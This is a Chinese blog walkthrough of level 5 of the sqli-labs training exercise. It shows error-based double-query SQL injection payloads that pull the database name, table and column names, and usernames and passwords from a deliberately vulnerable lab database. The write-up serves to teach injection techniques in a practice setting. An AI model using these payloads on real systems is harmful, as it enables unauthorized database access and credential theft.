码迷,mamicode.com
首页 > 数据库 > 详细

SQLI DUMB SERIES-5

时间:2019-03-12 12:18:19      阅读:527      评论:0      收藏:0      [点我收藏+]

标签:数据库名   错误信息   and   username   base   inf   group by   显示   www   

less5

(1)输入单引号,回显错误,说明存在注入点。输入的Id被一对单引号所包围,可以闭合单引号

 

 

技术图片

 

(2)输入正常时:?id=1

技术图片

说明没有显示位,因此不能使用联合查询了;可以使用报错注入,有两种方式

(3)双注入查询

参考资料:http://www.2cto.com/article/201303/192718.html

简单的说,使用聚合函数进行双注入查询时,会在错误信息中显示一部分错误信息,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

 1)爆数据库名

?id=-1‘ union select count(*),count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a--+

 技术图片

可知表明数据库名为"security"

2)将上述中的database(),改为version(),可得PHP版本

技术图片

3)同样的方法可以爆用户名

技术图片

 4)爆表名

?id=-1‘ union select count(*),count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a--+

 技术图片

改变Limit后面的数字可以爆出所有表名,例如

技术图片

5)爆列名(以user表为例)

?id=-1‘ union select count(*),count(*),concat((select column_name from information_schema.columns where table_name=‘users‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+

 技术图片

改变Limit后面的数字可以爆出所有列名,例如

技术图片

6)爆字段

?id=-1‘ union select count(*),count(*),concat((select concat_ws(‘[‘,password,username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+

 技术图片

Password与username之间用‘[‘隔开,同样改变Limit后面的数字可以爆出user表的所有字段。

 

SQLI DUMB SERIES-5

标签:数据库名   错误信息   and   username   base   inf   group by   显示   www   

原文地址:https://www.cnblogs.com/momoli/p/10463358.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!